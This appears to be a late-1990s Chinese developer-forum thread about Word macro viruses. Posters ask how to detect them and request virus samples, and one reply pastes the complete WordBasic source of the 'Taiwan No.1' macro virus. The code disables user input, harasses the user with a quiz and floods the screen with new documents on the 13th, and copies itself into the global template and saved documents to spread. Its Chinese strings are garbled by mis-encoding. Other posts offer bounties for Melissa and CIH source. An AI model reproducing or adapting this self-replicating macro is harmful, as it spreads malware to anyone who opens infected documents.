关于 宏 病毒(200分)

  • 主题发起人 主题发起人 CJ
  • 开始时间 开始时间
C

CJ

Unregistered / Unconfirmed
GUEST, unregistred user!
1、关于 WORD/EXCEL 的宏病毒,只是耳闻,未亲见,
想给个有病毒的东东
2、如何从外部了解,WORD/EXCEL 文件是否有宏病毒?//不打开WORD/EXCEL
甚至都没有安装
3、如何取得病毒代码?
4、有人说学 DELPHI 不如学 VB,原因是 VB 能写宏病毒!//我不想用DELPHI

5、经典宏病毒实例
 
1.其实只要使用了*.DOC一般都会碰到的,只是一般的用户都没有察觉到.
宏病毒甚至比OS病毒更广泛.
2.理论上是可以的,但实际操作太麻烦.只要知道DOC的格式就可以.
3.您想干吗?
3."美丽杀手",正热着哪!!!
 
1、未遇过;
2、100%需要DOC的内部格式,分析其有没有宏,如果有宏,再分析其代码,比较
得出有没有病毒的结论(需要病毒码);
3、病毒代码一般都经过加密、编译,已不是原来的源码了,所以似乎需要VB的解释
器才行。说不定用汇编可以搞定。:-)
4、凡是支持VB的都能写,因为它通过WORD传播。说不定将来可通过IE传播,因为
现在的IE5都已经支持用VB源程序写成的网页格式了。我觉得用DELPHI只能写象
CIH的那些病毒而无法写宏病毒;
5、告诉你一个办法,向王江民什么的病毒研究人员要。
 
下面是 宏1 病毒的源码,是我在Word下抓到的:
还有,找宏病毒并不用完全知道Word文挡的格式,因为那时保密的
但在Doc文件中宏和文挡内容是分开的,所以可以查出....
Dim nm__()
Public Sub MAIN()
ReDim nm__(4)
Dim test
Dim con
Dim tog$
Dim i
Dim ans$
Dim j
Dim nor
Dim kk
Dim t
Dim file$
Dim filem$
Dim nor1
Dim kkk
Dim tt
WordBasic.DisableInput 1
If WordBasic.Day(WordBasic.Now()) = 13 then
try:
On Error GoTo -1: On Error GoTo 0
On Error GoTo -1: On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm__(i) = WordBasic.Int(Rnd() * 10000)
con = (con * nm__(i))
If i = 4 then
tog$ = tog$ + Str(nm__(4)) + " =?"
GoTo beg
End If
tog$ = tog$ + Str(nm__(i)) + " *"
Next i
beg:
WordBasic.Beep
ans$ = WordBasic.[InputBox$]("さぱ琌 " + WordBasic.[Date$]() + " ,蛤????み衡笴栏" + Chr(13) + _
"璝?氮岿,??钡?綺举毙▅.............." + Chr(13) + _
tog$, "?芖 NO.1 Macro Virus")
If WordBasic.[RTrim$](WordBasic.[LTrim$](ans$)) = WordBasic.[LTrim$](Str(con)) then
WordBasic.MsgBox "?禤?氮癸?,?絋﹚碞?禗?稱?笵?....", _
"?芖 NO.1 Macro Virus"
WordBasic.FileNewDefault
WordBasic.CenterPara
WordBasic.FormatFont Font:="灿?砰", Points:=16, Bold:=1, Underline:=1
WordBasic.Beep
WordBasic.Insert "?孔エ栋痜瑀?"
WordBasic.InsertPara
WordBasic.Beep
WordBasic.Insert "氮?:"
WordBasic.Italic 1
WordBasic.Insert "и碞琌....."
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.Italic 0
WordBasic.FormatFont Font:="灿?砰", Points:=16, Bold:=1, Underline:=1
WordBasic.Beep
WordBasic.Insert "??箇ňエ栋痜瑀?"
WordBasic.InsertPara
WordBasic.Beep
WordBasic.Insert "氮?:"
WordBasic.Italic 1
WordBasic.Insert "ぃ璶?и....."
GoTo exit_
else
For j = 1 To 20
WordBasic.Beep
WordBasic.FileNewDefault
Next j
WordBasic.CenterPara
WordBasic.FormatFont Font:="灿?砰", Points:=16, Bold:=1, Underline:=1
WordBasic.Insert "エ栋痜瑀"
GoTo try
End If
Wend
End If
nor = WordBasic.CountMacros(0)
If nor > 0 then
For kk = 1 To nor
If WordBasic.[MacroName$](kk, 0) = "AutoOpen" then
t = 1
End If
Next kk

End If
file$ = WordBasic.[FileName$]()
filem$ = file$ + ":AutoOpen"
If t <> 1 then
WordBasic.MacroCopy filem$, "AutoOpen"
WordBasic.MacroCopy filem$, "AutoNew"
WordBasic.MacroCopy filem$, "AutoClose"
End If
nor1 = WordBasic.CountMacros(1)
If nor1 > 0 then
For kkk = 1 To nor1
If WordBasic.[MacroName$](kkk, 1) = "AutoOpen" then
tt = 1
End If
Next kkk

End If
If tt <> 1 then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "AutoOpen", filem$
End If

exit_:
End Sub
 
VC好样的,以下两个问题答了就加分(给你一个人)
1、如何取得代码的?
2、WORD里何处输入 VB 代码?
 
1.菜单: 工具/宏/录制新宏
2.菜单: 工具/宏/Visual Basic编辑器
ps: 虽然我来晚了,有没有我的分呢?
呜呜呜...我们出去的线被人拔了,三天没上来...
 
RE 晓茶 PS:当然可以
TO 晓茶:如果do
C 有宏病毒,如何让它不发作,有不删除之?
谁能写个宏病毒教程之类的?我再加 100
 
>TO 晓茶:如果do
C 有宏病毒,如何让它不发作,有不删除之?
禁止宏,应该行了吧?
ps: 有一个MM在去年被宏病毒害惨了,所以我的Word上一般都是禁止宏的,不过不知
有没有效果...
 
如何禁止?CJ WORD 盲
RE PS:UR GF?
BTW:去年有个 JJ 的文件遭到袭击,用KV杀了毒,文件打不开了,
向MS寻求技术支持(序列号是我给的),MS 满口答应,用了两小时
还是没打开,然后以使用过第三方产品为由,拒绝支持。
 
美丽杀手 的 SOURCE 有吗?300分!!
 
"美"病毒不是Macro病毒。
上面给出的是Taiwan 1号病毒,我这还有别的,你是否感兴趣?
不知你要病毒何用?研究吗?
编病毒不一定非得VB不可,Macro病毒的危害太小,易发现,所以意义不大!
 
>"美"病毒不是Macro病毒
我还是第一次听到这种说法 :)
 
这里所说的Macro病毒是指在修改Normal.dot,且自动加入AutoOpen之类的宏病毒。
据有关的报导,未曾有'美'病毒加入AutoOpen之类宏的介绍。具体情况只有拿到
'美'病毒方可确认。lhz你有该病毒吗?发来如何?
 
嘿嘿,来晚了,其实宏病毒并不高深
只要你熟悉 VB APPLICATION 语言就可以
VB APPLICATION 其实就是镶嵌在 WORD 和 EXCEL ACCESS里的VB
写法与VB的表达方式相同,只是对象种类是死的
因为支持文件操作,所以宏语言就有了破坏功能
现在WORD提供了INTERNET方面的宏,当然就有通过网络传播的机制
大家都是玩DELPHI的,相信要是想做个宏病毒并不困难
看两天VB APPLICATION就能写,劝大家不要去看那雕虫小技
过去我就写过删除文件的,不过只是为实验目的,嘿嘿
 
1、煤毒的SOURCE已经公开,哪位大吓如有请MAIL,300
2、VB FOR APP 有否电子版,请MAIL
 
诸位就没有这东东?
200 !!
分数公布如下:
这200:大家的劳动成果,酌情给
加300:美病毒SOURCE,如果不够,可面议
送100:VB FOR APPLICATION 电子版,CJ没钱买
大家踊跃发言
 
最终结论:
1、宏病毒是低级的无聊玩意
2、可以通过禁止宏,简单的防止之
3、美 病毒的代码是没人有了
4、大家不要写病毒
 
to : cj
美丽杀的源代码我有,还有CIH的,呵呵
VB APP 本身就包含于 EXECL,WORD等程序里, 你在装OFFICE时用
CUSTMOR 方式安装能选择安装VB APP 的帮助
 
后退
顶部